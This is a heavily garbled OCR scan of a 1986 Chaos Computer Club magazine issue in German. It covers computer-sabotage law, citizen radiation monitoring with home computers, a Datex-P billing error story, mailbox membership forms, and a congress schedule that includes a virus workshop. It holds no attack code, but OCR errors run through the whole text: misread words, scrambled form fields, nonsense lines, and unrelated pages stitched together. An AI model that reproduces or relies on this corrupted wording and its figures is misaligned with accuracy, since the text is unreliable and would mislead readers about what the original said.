gen“ decken sich mit denen des § 303 StGB. Die
genannten Gegenstände sind „beseitigt“, wenn sie
aus dem Verfügungs- oder Gebrauchsbereich des
Berechtigten entfernt sind. Sie sind „unbrauchbar",
wenn ihre Gebrauchsfähigkeit so stark beeinträch¬
tigt wird, daß sie nicht mehr ordnungsgemäß ver¬
wendet werden können, und „verändert“, wenn ein
vom bisherigen abweichender Zustand herbeige¬
führt wird. Der Ausschuß hat sich dafür entschie¬
den. die Nummer 2 nicht nur als qualifizierte Sach¬
beschädigung auszugestalten. Auch dann, wenn
sich die einzelnen Tathandlungen gegen eigene
Sachen richten, soll die Nummer 2 anwendbar sein,
wenn dadurch die wesentliche Datenverarbeitung
eines dem Täter nicht gehörenden Unternehmens
oder einer Behörde gestört wird. Für die Nummer 1
lassen sich ähnliche Ergebnisse durch eine entspre¬
chende Auslegimg des § 303 a StGB erreichen.
Absatz 2
Wie bei den §§ 303,303 a StGB und den Sabotagetat¬
beständen der §§ 316 b, 317 StGB wird der Versuch
für strafbar erldärL
Vor Tschernobyl wurden diese mit Computern
arbeitenden Initiativen oft genauso argwöh¬
nisch betrachtet wie die Atomkraftwerke. Jetzt
ist das Verhältnis entspannt.
Als Hardware vor Ort dient ein VC20 mit Da-
tasette, Drucker, Echtzeituhr, Netz- und Bat¬
teriebetrieb.
Am Useroort hängen MeßfühlerfürWind, Wet¬
ter und Strahlung.
Ein C64 bildet cfas örtliche Kleinarchiv, eine
5209r Aufrüstung teils in Planung.
Zum mobilen Meßkit gehört Kompaß mit Vi¬
siereinrichtung auf Kamerastativ: Kühlturm
bekannten Formats anpeilen, dann Standort¬
bestimmung auf Meßtischblatt.
Wettermessung ist eine wichtige Vorausset¬
zung für verläßliche Strahlungsdaten. Fein¬
mechaniker stellten benötigte Präzisionsteile
bei befreundeten Firmen her.
Der Batteriebetrieb ermöglicht nahezu stö¬
rungsfreien Betrieb auch bei Ausfällen des
Stromnetzes.
Meßdaten werden archiviert und bundesweit
ausgewertet.
Derzeit bilden sich an verschiedenen anderen
Standorten der Kernspaltung in den Bürgeri¬
nitiativen weitere Meß-Initiativen mit dem Ziel,
ein bundesweites öffentliches Atomkataster
zu erstellen. (crd8606291700)
VQC7,<?9 DM_
.*b 100 DM_
4,2.00 DM_
7.0,00 DM_
60,00 DM _
6in AOO bringt Unbekannte« öfter'
(.eOPHsabo ds (wer nder wae lebt langer""
Fo'dorabc R Ausg.iben
Jahr..?.,-,ho B A. Nor ma! v er cl i pner
Sonderaho 0 A. NLIF< Sc hui er ci. a . ' ' '
SonaeraDD und HacIerhibol Teil 1
daPE-daH0 jeweils inkl. Porto/Verp.
(Bild umgesägter E-Mast)
Stillstand nach Stromausfall
“Sägende Sofortabschalter, die - abgesehen
von der Gesetzeslage - teilweise ziemlich
leichtsinnig Strommasten umlegen (immerhin
AKW-Notabschalttest, dazu zehntausende
Volt Schrittspannung) veranlaßten kürzlich
einige Hamburger (Sroßrechenzentren, ihre
Wiederanlauffähigkeit nach Kurzzeitstro¬
mausfall zu testen. Bei zumindest zwei Re¬
chenzentren erwies sich das System als ver-
bessenjngsbedürftig. (crd860629l 702)
RallaMcnitlIvns d«' •lll^tlieKan MeduIFvnVtiv
Fün^ Jahr© Chaos - Ende o-f-fen
Vor genau 5 Jahren (11./12. SeptefDber
1981) -fand in Berlin das erste
Treffen des CCC statt. "Mißtraut
Aktentaschen und Kartons" war die
Überschrift einer Berliner
Tageszeitung damals.
Seit Frühjahr 1984 gibt es die
datenschleuder. Angefangen hat es mit
vier Seiten A4, die jetzige Ausgabe
umfaßt immerhin 16 Seiten. Die kleine
Schrift (dichtgepackte Information)
brachte Gerüchte, wir würden vom
Optikerverband unterstützt. Das
regelmäßige Erscheinen wurde trotz
guter Vorsätze bisher nicht erreicht^
gelegentlich wurde die ds schon
totgeglaubt.
Eintreffende Briefe mit bösen
Forderungen und Drohungen zB wegen
"Nichtlieferung" von Abo usw. werden
mit Verweis auf das Chaos und
Rückerstattung beantwortet. Die ds
erscheint öfter , wenn konstruktivere
Textbeiträge hier eingehen. Wir tun
unser bestes, auch wenn es manchen
nicht reicht. Finanzielle Bereich¬
erung , wie Unwissende unterstellen,
liegt nicht vor. Wir brauchen im
Gegenteil Spenden. Es gibt kaum noch
Zeitschriften, die nicht von Werbung
abhängig sind.
Oie datenschleuder ist von Lesern
abhängig und freuen uns über Jede
Uoterstützuna. ds-red.
NUI OFF
Welcher Kopplerbesltzar hat noch nicht mit dam Gedanken
g sspieH sich auch einmal im Dalex P-Natz der Deut^hen
undespost zu versuchen ?1 So auch ich. Also nichts wia ran
ans Telefon, Fernmeldeamt angerufen und ein Antragsfor¬
mular für eine Network-User-Identifikatlon (NUI) beantragt.
Nach zwei falschen Antragsformularen kam dann auch nach
ca. 10 tagen daß heißersehnte Papier, Ausfüllen und wieder
abschicken wurije auf der Stelle erledigt. Als die NUI dann
nach einiger Zeit per Einschreiben zugestellt wurde, konnte
ich es gar nicht abwanen den Rechner einzuschallen. Kurz
nochmal die milgespeicherfe Datex P-Anleitung einer der
Maifboxen 'durchgelesen, ein paar NUA’s (Network-User-
Adress) aus derselben Mailbox notiert, und dann gings los.
Doch was ist das ?? Da will doch dieser blöde Rechner, der
in diesem Fall in England stand, auch noch einen Usarnamen
und ein Passwort wissen. Nach einigen Fehlversuchen pro¬
bierteich es in den USA. aber die wollten ihre Daten auch nicht
kostenlos herausgeben. Da stand ich nun mit meinem Latein
und meiner NUI. Da meine Englischkenntnisse auch nicht
gerade die eines Engländers waren, gab ich es erstmal wieder
auf. Ich sagte mir. die 15 DM im Monat ward ich auch noch
verkraften, vielleicht lern ich in Sachen Datex ja nochmal was
dazu, und dann könnte ich die NUI sicher nochmal gebrau¬
chen. Als ich nun nach zwei Monaten immer noch keine
Gebührenabrechnung vom Fernmeldeamt bekommen hatte,
wunderte ich mich zwar, dachte mir aber nichts dabei. Der
große Schock kam erst nach gut drei Monaten. Und zwar in
Form einer Fernmelderachnung über 1090.13 DM. Da mußte
ich erstmal schlucken. Als sich die ersten Schluckkrämpfe
gelegt hatten rief ich natürlich sofort bei derFernmaiderech-
nungsstelle an um die Rechnung überprüfen zu lassen. Die
Dame am Telefon wusste allerdings nichts von so einer
Rechnungssumme. Lediglich eine Summe von ca. 60.- DM sei
ihr bekannt. Nun. das hörte sich ja schon ganz gim an, mit etwa
so einer Summe hatte ich auch gerecnnel.Doch plötzlich
verwandelte sich meine Erleichterung in die bekannten
Schluckstörungen. Oie freundliche Dame teilte mir mit daß da
nachträglich noch etwas 'von Hand’ auf meiner Rechnung
geändert worden wäre (was immer das auch heißen mochte}.
§ie verwies mich dann an die zuständige Stelle für Datex-P.
Dia konnten mir aber leider auch nicht helfen, wollten aber,
wenn ich gleich vorbeikommen würde, meine NUI noch am
selben Tag sperren. Ich also hin, NUI zu sofort gekündigt und
gefragt was ich denn nun machen könne. Man sagte mir daß
man versuchen wollte die Gebühren zu überprüfen. Mit der
Versicherung daß die NUI noch am gleichen Tag gesperrt
würde fuhricn also wieder nach Hause. Als ich nach etwa einer
Woche immer noch nichts vom Fernmeldeamt gehört halte
kam mir Samstagnachmiltag beim Frühstücken der Gedanke
mal den Pad anzurulen und die NUI auszuprobieren. Ich
dachte mich tritt ein Pfard.:Teilnehmerkennung DTAMMANY
aktiv III Daraufhin probierte ich natürlich noch mehrere Male
und bekam bis Montagmorgen noch die Aktivmeldung. Auf
den sofortigen Anruf beim Fernmeldeamt wurde mir geant¬
wortet daß man NUI's nur von Sonntag auf Montag sperren
könne und am letzten Sonntag die dafür benötigten 'Spei¬
cherplätze' schon belegt gewesen wären.... Nach ca. vier
Wocnen bekam Ich dann einen Anruf vom Fernmeldeamt in
dem man mir rttitteille daß mir die Gebührenaufstatlung die ich
beantragt hatte nicht zustellen könne, mir bliebe aber frei¬
gestellt die Aufstellung im Amt einzusehen. Jenes würde aber
nochmal zwei wochen dauern, da die Aufstellung noch nicht
da sei. Nach abermalsdrei Wochen klingeltedann endlich das
Telefon. Ziemlich kleinlaut erklärte mir die Dame am Apparat
daß man angewiesen worden wäre mir 990.- DM zu erstatten,
da im Datex-System ein Softwarefehler gewesen wäre. Was
das nun ist wußte sie natürlich nicht und sie hatte von Oatex-P
natürlich auch keine Ahnung, da müßte ich mich schon an die
dafür zuständige Stelle wenden. Ich legte dann auf und
dachte darüber nach was wohl einige größere Firmen ge¬
macht haben die diesem ’Softwarefenler zum Opfer fielen ?
So ein Fehlertrrttja nichtnurbeieinem auf. Ich nähme an sie
haben ihren Mifarbeilern gesagt sie sollen nicht soviel lefe'
fonieren (wenn ihnen die erhönie Summe überhaupt aufge-
fallen ist) und haben ohne zu zögern die Rechnung bezahlt
nubff.wB 19860416 1900 8 SB/Sy
Für die Teilnahme am Chaos Communlearton Centar
Ich/Wir wollen Teilnehmer auf dem Chaos Commurecohon
Center der Club-Mailbox, werden, (nur mit Einiugsermächh-
' gung)
Benutzername:.(max. 15 Stellen, nur A-Z als er¬
stes Zeichen, danach Telexzeichenvorrot ohne Umlaute).
Kennwort zur Einrichtung:.(mindestens 6 Stellen)
Bei Teilnahme erkenne ich die Nutzungsbedingungen tur das
Chaos Communication Center an. Die Nutzungsgebühren von
mindestens DM 8,— werden monatlich abgebucht.
UnterVchrifi,' bei Minderjährigen die des gesetzlichen Vertreters
yerLns..^:^f
S^atenSdilettbev
Das wissenschattHche Fachblatt für Datenreisande
Ein Organ Cnaos Computer Club
Sx i .. O . S 3 iS o .§5 S? t icc
i iii o.3| =1-5 it ;i
fr 15 M I ■ I l|i II Is' •:!
Einzugsermöchtigung. Das Mitglied ermächtigt den CCC eV PostteiUahl, Ort, Datum
widerruflich, die Mitglledsbeiträge idhrlich oder halb|ährlich - -
sowie die Nutzungsgebühren für das Chaos Communication-^ -
Center monatlich oTjbuchen zu lassen. OatenschutMnweis: Die Daten werden während der Milglied-
schaf t zur maschinellen e /- Verarbeitung gespeichert.
i w»/.-/.choos T«llne.hm»r/l n/s | von nachstehend angegebenem Konto einzuziehen
ZA Postgirokonto-Nr. ^ beim Postgiroamt
~ZA Girokonto^. ' ^ ^ ^ ^ ' Bankleitzehidee Kreditinstituts
3 I I I I I I I I I _I_—^—I——I—^——lJ W^T
B Name und Anschrift des Kreditinstitutes
wr
Das Konto wird beim Geldinstitut unter tolgender Bezeichnung geführt (Name des Kontoinhabers)
E Von den Hinweisen der Deutschen Bundespost für die Teil-
0 ) nähme am Lastschrifteinzug habe ich Kenntnis genommen.
e- ^
-E D>
Ol P.
T-V-
lünTr-
wird vom Amt für Chaos gsprilft
ggf. SA 80 gepruH | SA 00 geprüft
Unterschrift do/r/s Kontolnhober/ln/s
D&s yiTssenschäftltche Fachblatt für DalanrelMrde
Eirt Oryan des Cnaos Corriputer Club
^atenödiieuDet
Choos Cemmunkation CenterFragen & Antworten
kommfi !th aufdi^ CCC-MaUbox?
— nur als Mitglied
— durch Antrog {siehe rechts)
— ich brauche ein Girokonto
Wie werde Ich Mitglied?
— Durch Antrog (siehe rechts)
Was wollt ihr?
— aktive Mitarbeit und/oder Unterstützung
— zwonzig Mark AufnoKmegebühr (Verwoltung)
— von Schülern und Studenten sechzig Mark im Johr
— von anderen einhundertzwanzig Mark im Jahr
Warum brauche Ich ein Girokonto?
Oie Abrechnung der Moilboxkosten geschieht Im Einzugsver¬
fahren. Anders ist die Verwaltungsorbeit für uns zu kompliziert.
Viele ,Kreditinstitute führen kostenfreie Schülergirokonten
(meist ohne Magnetkarte), sollten Euch eure Lehrnmiftelgeld-
verwolter nicht fördern.
Was kostet die CCC-Moilbox?
Grundgebühr inklusive 47 Freimtnuten monatlich DM 8,-. Die
werden jeden Monat eingerogen.
Die Bonx erholt eine Floppy von uns.
Dozu kommen bei Bedarf:
jede weitere Anscholtminute 15 Pfg
je versendete Nachricht im CCC-System 7 Pfg
je Telefonolarm (BRD) 80 Pfg
deiweiferen leider noch Geldbeutel:
— Dotenbonkgebühren je noch Dotenbonkobfroge
— Telex, Telexgebüliren plus geringer Zeitgebülir
— Nachrichten in andere Systeme, Datex-P Zuschlag.
Htitiöö?
Ihr erreicht das CCC-System über einen Telefonport (Bremen)
oder mehrere Dotex-P Zugönge. Für DM 8,- hobt ihr einen Ein¬
trog auf dem CCC-System. Die Nutzungsgebühren innerhalb
des Systems sind preiswert. Teurer werden Dotenbankdiensfe,
Telex und Intermoilverblndungen zu onderen Moilboxsystemen.
Die werden je noch Aufwand weiterberechnet.
Was verdient der CCC daran?
Nix.
Die Mailboxgebühren werden ohne Aufschlag weitergegeben.
Was habe Ich xu beochten?
Für die Mailbox wird derzeit die Nutrunasordnung vom Chaos
Computer Club erstellt. Sie regelt dos Teilnehmerverholtnls ent¬
sprechend den Vertrogsbedingungen für rjic Benutzung des IN¬
FEX-Systemes. Wesentliche Punkte enrhölt dieser Beitrog.
Was passiert nun?
7. Ich fülle den Antrog rechts kräftig ousi
2. Wir stimmen meist zu.
3. Der Beitrag wird überwiesen, eingezogen oder gebracht.
4. Liegt eine Einzugsermöchtigung vor, stellen wir auf Wunsch
einen Eintrag im CCC-System zur Verfügung,
5. Weitere Leistungen für Mitglieder können nicht ausgeschlos¬
sen werden und sind beabsichtigt.
Wie komme ich wieder raus?
Aus dem CCC nur einmal im Jahr mit dreimonatiger Vorwar¬
nung. Aus der Mailbox mit drei Monaten Kündigungszeit.
CHAOS-TEAM
Choos Communication Congress 1986
Z 8 + 2 . TSez hetf
* ’ Durch dos verlängerte Welh-
nochfswochendende ergibt sich diesmal kein Wochenendter¬
min. Die Aufbauorbelten In den Raumen des Eidelstedter Bür¬
gerhauses beginnen om Somstag dem 27. Dezember. Ab Sonn¬
tag können Arbeitsgruppen, Hilfskräfte und Teifnehmer anrei-
sen. Obernachtungsmöglichkeiten werden vom Sonntag bis
Dienstag bereitgehalten. <
Der Congress wird am Montag um 10 Uhr eröffnet und endet
Dienstag gegen 22 Uhr.
Anregungen für Themenbereiche, sowie Referenten sind will¬
kommen (Fernmündlich 040/483752 Leitstelle 23 — da meldet
sich ein MENSCHI). Weitere Informationen sowie die Teilnah¬
mebedingungen werden zum Äugigst in der datenschleuderhe-
konntgegeben. is23
DV-unterstützter Informationsaustausch
Auf der Basis der Erfahrung mit Mailbox-Systemen in den USA,
die dort grenzüberschreitend Informationsaustausch Für Oppo¬
sitionsgruppen betreiben, sollen diese auch in Deutschland ver¬
stärkt genutzt werden. Insbesondere die Koordination¬
serfahrungen, die man mH der Datenkommuntka-
tion in den USA für Besefzungsplenung von öffentli¬
chen Oebäuden \rt über 30 Städten gewonnen hotte, hot die
linke Szene in der Bundesrepublik aufmerken lossen. Auf
schnellstem Wege hatten bei dieser spektokulären Aktion die
Besetzer untereinander Informationen oustouschen können und
ihr Verhalten gegenüber den Sicherheitsbehörden koordiniert.
Aus: SICHERHEITS-SERA TER, S. 133 (Handelsblattverlach)
Chaos Communication Center — Hintergrundinfo
Der CCC schafft einen elektronischen Treffpunkt als Forum für
seine Mitglieder und wählte ah Werkzeug CeoNet, dos derzeit
ausgereifteste Mailboxsystem in Europa. Als Setreiber mochte
die Bremer Infex GmbH das beste Angebot.
Die Infex GmbH stellt dem CCC Systemanteile auf einem nur
von Vereinen genutztem Moilboxsystem zur Verfügung. Die
Einzelobrechnungen der Teilnehmer werden nicht vom Betrei¬
ber (Infex), sondern vom CCC durchgeführt. So Ist es möglich,
kostengünstig ein GeoNet-Moilboxsysfem im Rahmen der CCC
Mitarbeit zu gebrauchen.
Die GeoNet Mailboxsysteme werden derzeit in der Bundesre¬
publik neben der Infex auch von der Deutschen Moilbox kom¬
merziell betrieben. Die'Österreichische Post hat sich, im Gegen-
sotz zur Bundespost, für eiri GeoNet Moilboxsystem entschie¬
den. Durch die reiotiv hohe Kostenschronke von ca. DM 40,-
Grundgebühr konnten sich bisher nur Firmen den Komfort eines
solchen Systems leisten.
Der CCC ermöglicht bei Mindestnutzung des Systems für Mit¬
glieder Nutzungskosten von DM 8,- Im Monat.
‘Dieim GeoMaH-Verbundjetztzusommenarbeitenden mehre¬
ren Tausend Benutzer repräsentieren eine sehr heterogene und
infernofionole Leserschoft mit Querverbindungen zu vielen an¬
deren elektronischen Medien und damit zu einer Orasi Reot
PopuloHon (elektronische Eingeborene) von oufgeschlosse-
nen Menschen, die nicht nur possiv Nachrichten konsumieren,
sondern sie dank des Mediums MAILBOX aktiv und aufwand¬
sarm kommentieren können. Es ist diese neue Fähigkeit, die
Mailbox-Systeme so grundlegend anders machen, als traditio¬
nelle Kommunikations-Medien “ (Günter Leue, GeoNet)
Grundsätzliche Merkmale des CCC-Systems
— Zugriff über das Ferngespräch (1 Port / 37nld) __
— Zugriff über dos Datex-P Netz (7 Ports)
— mehrsprachige befehlsorientierte Dialogführung
— gleichzeitiger Zugriff durch 8 Hocker
— zeitgesteuerte Verwaltung von 23 persönlichen Bitbergen
— Schwarze Bretter, themenoezogene InFosammelplötze
— clubbezogen und zu allgemeinen Interessen
— Nochrichtenousfausch mit Teilnehmern oder Schwarzen
Brettern in anderen GeoNet-Systemem im In- und Ausiond
— Dialogmöglichkeit onwesender Teilnehmer
— Flndefunktionen für Nochrichten und Verzeichnisse
— Telefonsklove zur Alarmierung von Teilnehmern bei ^
wichtiger Post ^
— Versand und Erhalt von Telexen (derzeit nur weltweit)
— Zugriff auf Datenbanken, Presseagenturen...
Neben dem CCC werden zwei weitere Vereine und einige Wis¬
senschaftlergruppen gemeinsam. In einem Moilbox-Gremium,
das System gestalten.
Der CCC wird die Clubarbeit und den Kontakt unter den Mit¬
gliedern aus oller Welt auf seinem elektronischem Clubcenter
dem CHAOS COMMUNICATION CENTER, abwickeln.
ev2.txi
WAiMi ■Mwii Geonel: Geo1 :Chaos-Teom
Anschriftenausschnitt bitte ^chZrÄlas bix-, * 655321 #
mit liAiiAT AHffVhMUh Tfinif^ üas wissenschaftlich« Fachblatt für Datenreisende
m« neuer zurw^ Computer Dup
mit neuer Aefa^esse zurück
Chaos Computer Club
Partner auf dem Weg zur Informationsgesellschaft.
Mit Wirkung vom }4. April 1986 wurde der Chaos Computer
Club e. V. unter der Nummer 10940 beim Amtsgericht Hamburg
in das Vereinsregister eingetragen.
Es begann 19811 mit einem Treffen von Computerfreoks In Ber¬
lin. Die ersten Personal Computer eroberten die Büros und wa¬
ren zu erschwinglichen Preisen im Handel.
Mon wollte Informationen tauschen, doch gab es damals kaum
Möglichkeiten dafür. Die Bundesrepublik wor auf diesem Ge¬
biet ein Entwicklungsland.
Im Februar 1984 erschien die datenschleudermW Informationen
für die Szene, die sich als "wissenschaftlich" bezeichnet, für die
aber auch Bezeichnungen wie "Underground-Postille" und
"Hockerschmlerblott" verwendet werden: dos Fachblatt für Da¬
tenreisende.
Seitdem bemüht sich ein offener Kreis von Leuten darum, Infor¬
mationen über die Verwendung der Technik — insbesondere
Neuer Medien — zu sammeln und zugänglich zu machen:
Bürgorhllfe Im Tochfilkdsehungol.
Dur<^ die spektakuläre Btx-Aktion des CCC tm September '84
(Verbraucherschutzaktion 134.000,- bei der Haspa) erregte der
Club bundesweites Aufsehen.
Leider sind wesentliche Aktivitäten des CCC im Medientrubel
untergongen oder wurden fälschlich dorgesfellt.
Teile der Presse schreiben "Hacker" in Gänsefüßchen und ver¬
kaufen sie als Computerterroristen und gefährliche Datenräu¬
ber. Während mit einer Hacker-Panik noch Zeitschriftenumsät¬
ze geschürt werden und ängstliche Anwender von cleveren "Be¬
ratern” die bedenklichsten Sicherungssysteme aufgedrückt be¬
kommen, und viele den Computer verteufeln, zieht die Informa-
tionsgesellschaft kaum bemerkt in unsere Kinderzimmerein.
Hackersind neugierige Reisende im modernen Alltag. Forscher
und Menschen, die sehr bewußt — und offen — mit Neuen
Technologien umgehen.
Computerkriminelle haben im Gegensatz dazu Gehelmhaltung¬
sprobleme und Bereicherungsabsichten.
Die Gesetzgebung zur Computerkriminalität trägt dem auch
Rechnung.
Die Älteren und die deutsche Industrie betrachten
erstaunt die Bntwlcklungj manche fassungs- und ta¬
tenlos. Andere begreifen, was los Ist. Insgesamt
wächst dos BewuStsein um Datenunsicherheit stetig,
aber langsam.
Zum Herbst '85 stellte der CCC sein Wissen In der Hocker-
bibel Teil 1 zusammen (Die Hockerbibel ISBN 3-922708-98-6).
Das 256 Seiten umfassende Werk wurde bisher über 3500 mal
zu einem "sozialem" Preis von ca. 13 Pfennig die A4-Seite ver¬
trieben.
Zweimal bisher, jeweils zum Johreswechsel, veronstaltete der
CCC den Choos Communicotion Congress. Dos jährliche inter-
nathnale Treffen von über 400 Dalenrehenden führte Interes-
s/erfe Menschen zusammen und verdeutlichte die Loge: Wenig
Informationen, kaum technologische Förderung der Jugend,
keine Erfahrung Ober die SoxlalvertHigllchkeft neuer Tech¬
nologien.
Darin spiegelt sieh auch die Rasanx d«r Entwicklung.
Modernes Opfer
dpa Heilbronn Oie Verwechslung zweier Adopter-
Stecker hat In der Heilbronner Kinderklinik zum Tod
eines 16 Monate ölten Mädchens aeführt. Eine Kran«
kenschwester hatte Meßefekfroden eines Gerätes,
das das Herz überwacht, an einen Infusomaten an-
geschiossen. Das Baby bekam einen Stromschlag
von 220 Volt. (Hmb. Abdbi 2.5.86)
Oie Informationsgesellschaft unserer Toge ist ohne Computer
nicht mehr denkbar. Die Einsatzmöglichkeiten der automatisier¬
ten Datenverarbeitung und Datenübermittlung bergen Chan¬
cen, aber auch Gefahren für den Einzelnen und für die Gesell¬
schaft. {Präambel der CCC Satzung)
Das große Informatiortsbedürfnis in der Bevölkerung überflute¬
te das Chcos-Teom mit Bergen von Anfrogen, ober auch Ver¬
waltungsarbeiten. Die Aboabfeilung der Datenschleuder erwies
sich als ein kraftsaJgendes schwarzes Loch. Dem CCC fehlt es
an einem totkroftigen Sekretariof plus Computern. Auch die
Clubräume in Hamburg (Anlaufodressse, Redaktionsräume und
Tagung von Erfahrungsaustauschkreisen) stellen den Club vor
finanzielle, organisatorische und rechtliche Probleme.
Zahlreiche Anfragen, zur Teilnahme on öffentlichen Informo-
tionsveronsJoltungen rund um Informations- und Kommunika¬
tionstechniken, Verbraucherschutz sowie den Einsotz soziolver-
träglicher Technologien drohten die Kapazitölen der hambur-
ger Gruppe zu sprengen.
Einziger Ausweg ist die Offensive, die Gründung eines Verei¬
nes. Dadurch ist es dem CCC möglich, jedem Mitglied die Nut¬
zung eines Mailbox- und Informationssystemes zugönglich zu
machen. Oer CCC bietet ein Forum zum elektronischem Infor¬
mationsaustausch auf internationaler Ebene.
„Nach uns die Zukunft; vielfältig uns abwechslungsreich durch
Ausbildung und Praxis im richtigem ümgong mit Computern.
Wir verwirklichen soweit wie möglich das NEUE Menschenrecht
auf zumindest weltweiten freien, unbehinderten und nicht kon-.
trollierbaren Informationsaustausch unter ausnahmslos ollen
Lebewesen.
Computer sind dobei eine nicht wieder obschoffbore Vorous-
setzung. Computer sind Spiel-, Werk-, und Denk-
Zeug; vor ollem aber: "dos wichtigste neue Me¬
dium". Zur Erklärung: Jahrhunderte noch den "Print”-Medien
wie Bücher, Zeitschriften urd Zeitungen enstonden Medien zur
globalen Verbreitung von Bild und Ton; olso Foto, Film, Rodio
und Fernsehen. Das entscheidenste heutige neue Medium ist
der Computer. Mit seiner Hilfe lassen sich Informationen
"über olles denkbare" In dieser Galaxis übermitteln
und — kraft des Verstandes — wird neues geschoffen.“ (Aus
der Datenschleuder 1, Februor 1984),
Bildschirmtext hat gezeigt, daß man ein Z-Klossen-System (An¬
bieter und Abrufer) keinem bewußtem Menschen zumuten
kann. Mailbox-Systeme kennen nur eine Klosse. Jeder Teilneh¬
mer kann Informationen obrufen, kommentieren oder selber
welche über die Schwarzen Bretter enbieten.
Eine Mitgliedschaft im CCC e.V. ermöglicht die Teilnahme am
Nachrichtenverkehr auf einem Geonat-Systom zu Preisen
der Wunschmaschln« Bildschirmtext. Alle Mallbox-Toll-
nohmer sind gleichberechtigte Informationsanbieter in
einem Informofionsbasor rund um Wissenschaft, Technik und
alles was Spaß macht und wenig kostet. Kommerzielle Aktivitä¬
ten der Mitglieder sind dort unerwünscht.
"Der Chaos Computer Club ist eine golaktische GemeinschoB
von Lebewesen, unabhängig von Alter, jGeschlecht und Rosse
sowie gesel/schoft/icher Stellung, die sich grenzüberschreitend
für Informationsfreiheit einsetzt und mit den Auswirkungen von
Techno/og/en auf die Gesellschaft sowie das einzelne Lebewe-
sen beschäftig! und das Wissen um diese Entwicklung fördert,"
(CCC-Safzung),
Der CCC behält seine offene Struktur. Er bietet Interessierten
mehralsain Forum. MIfun,di.Zukunft/
Damit Sie auch morgen noch kraftvoll zubyten kön¬
nen: Zum dritten Mal veranstaltet der CCC in Ham¬
burg seinen Communication Congress. Vom 27. De-
zember(Aurbauiag) über Sonntag und Montag (Con-
gresslage) bis zum Dienstag den 30. Dezember (Ab¬
baulag) treffen sich Dalenreisende, Telefonfreaks,
Informationspfadfinder, Funkmaniacs, Netzflaneue-
re, Bitniks, Hacker und Hacksen.
Veransialtungsort ist das Eidelsiedicr Bürgerhaus.
Elbgaustraße 12, in Hamburg Eidelstedt.
Dort öffnen sich am Sonntag den 28. Dezember
gegen 10 Uhr die Tore. Helfer und Referenten wer¬
den schon ab Samstag Nachmittag eingelassen. We¬
gen der technischen Demonstrationen gelten die
Räuniiichkeiien als „Elektrisches Labor“, zu dem nur
Unterwiesene Zutritt haben. Jeder Teilnehmer hat
sich bei örtlichen Funkamateuren oder Elektronikern
vorher fachkundig zu machen. Das Fotografieren
sowie das Aufzeichnen mittels Tonträgern ist, wie in
den vergangenen Jahren, aus Datenschutzgründen
untersagt. Im Rahmen der Pressearbeit sind TV-
Teams anwesend.
Gäste benötigen dieses Jahr kein Passfoto, lediglich
Helfer bekommen einen Ausweis und sollten ein
Passfoto mitbringen. Sollte ein Gast auf einem SOU¬
VENIR bestehen, erhält er natürlich einen.
Der Eintritt beträgt für Mitglieder (CCCeV) DM 15,-,
für alle anderen DM 20,-, mit Ausnahme der Presse
(DM 50,-) und gewerblichen Teilnehmern (DM 150.-)
Voranmeldung durch Einzahlung auf Postgiros
599090-2Ü1 beim Poslschleckamt Hamburg BLZ
20010020 für den CCCeV. Bitte Beleg mitbringen!
Der Betrag gilt für die ganze Congressdauer.
Schlafplätze sollte man sich privat besorgen. Fragt
über die Hamburger Mailboxen an. Wer es sich lei¬
sten kann, dem sei ein preiswertes Zimmer auf der
Reeperbahn (da gibts nachts noch was zu essen) emp¬
fohlen. Für Ausnahmefälle hat der CCC ca. 30
Nachtlager (Schlafsack!) von Samstag bis Montag in
petto.
Während des Congresses ist die CONGRESS-BOX
unter der Rufnummer 040-5703060 online. (ACH¬
TUNG: Diese Nummer gilt nurvom 27. - 30.12.!)
Die VERMITTLUNG des Congresses ist über die
Rufnummer 040-5703086 ab Freitag erreichbar.
WEITERE INFORMATIONEN in der CCC Ge¬
schäftsstelle 040-4903757, der CLINCH-Mailbox
040-6323517 oder, für Referenten und was Organisa-
tionsfragen betrifft, Leitstelle 23: 040-483752 (Voi-
cel).
Dateascbleuder t
4
Kongressfahrplan
Sanistts 27. Dezember (Aofbautag)
Für Techniker, Referenten und Unlerstützer
Sonntag 28. Dezember (1. Congresstag)
09:00 Einlass für Mitarbeiter, Techniker und Refe¬
renten
09:30 Abnahme der Räume (letzter Sicherheit-
sCheck)
10:00 TORI: Einlass fürOäste. Öffnung.
HACK.-CENTER:Technik al la Cart’
CHAOS-CAFE: Frühstück und Cafe
TREFF; Raum für Gesprächsgruppen (bitte anmel¬
den)
ARCHIV: Fotokopiererund viel Papier
BILD&FUNK: Datenfunk und Bildschirmlext
11:00 THEATER: Eröffnungsansprache. Hinweise
zum Ablauf
11:30 TREFF: Infotrefffürdie Presse (max. 30 Min.)
12:00 THEATER: Sichere Kopplung an das Postnetz.
Was läuft
bei der Post; Prüfverfahren. Verhalten bei Haus¬
durchsuchungen. (Workshop BHP,CAC,CCC)
13:30 THEATER; Parlakom - das Parlament am
Netz.
Computer im Bundestag (Vortrag der Hamburger)
14:30 THEATER: Die Computer Artists Cologne
stellen sich vor.
14:30 TREFF: Datenfernübertragung für Anfänger
(Workshop)
15:30 THEATER: PC-Virenforum (Workshop
BHP.CCCundGäste)
- Was sind Computerviren? (Vortrag)
- Wie arbeiten Viren? (prakt. Demo)
- Gibt es einen Schutz vor Viren? (Workshop)
- Umgang mit Viren, Ausblick (Diskussion)
18:30 Ende
18:50 THEATER: Video Uber den letzten Congress
(bis 20:20)
19:00 TREFF: Organisationsgespräch der Projektlei-
ter
19:30 Schliessung der Räume. Alle gehen ms Theater.
20:00 THEATER: Hinweise auf das Programm vom
Montag,
Übernachtungsmöglichkeiten,...
20:30 Tagungsende
21:00 Schliessung der Räume (Wachdienst)
aPA3MMi iPATCm
aaSujiim
= TO TEET =
TO ÄiXPnMO
TETPArQNO
Montag 29. Dezember (2. Congresstag)
08:00 Aufklaren der Räume durch Nachtschicht
09:00 Einlass der Mitarbeiter, Raumabnahme
09:30 TORI: Einlass fürOäste. Öffnung.
10:00 THEATER: Programmvorschau
10:30 THEATER: Kompromittierende Abstrahlung;
Abhören
von Monitoren und Fernsprechern. (Workshop
BHP.CCC)
11:30 THEATER: Frühschoppen
Fünf Hacker aus sechs Ländern (in Englisch)
13:00 TREFF: Pressetrefr(CCC,CAC,BHP und Gä¬
ste)
13:00 TH EATER; Resümee des Sysoptages vom letz¬
tem Congress.
Kurz zu InterpoolNel. Hinweise auf Workshops.
14:00 THEATER: Informationen zum Netzverhund
FIDO-NET
14:00 TREFF: Auswirkungen des 2. WiKg.
Workshop auch über "Hacker-Jäger" (BHP)
15:00 THEATER: Desktop Puplishing - die Zeit¬
schrift vom
Schreibtisch. Am Beispiel des Cenethischen Informa¬
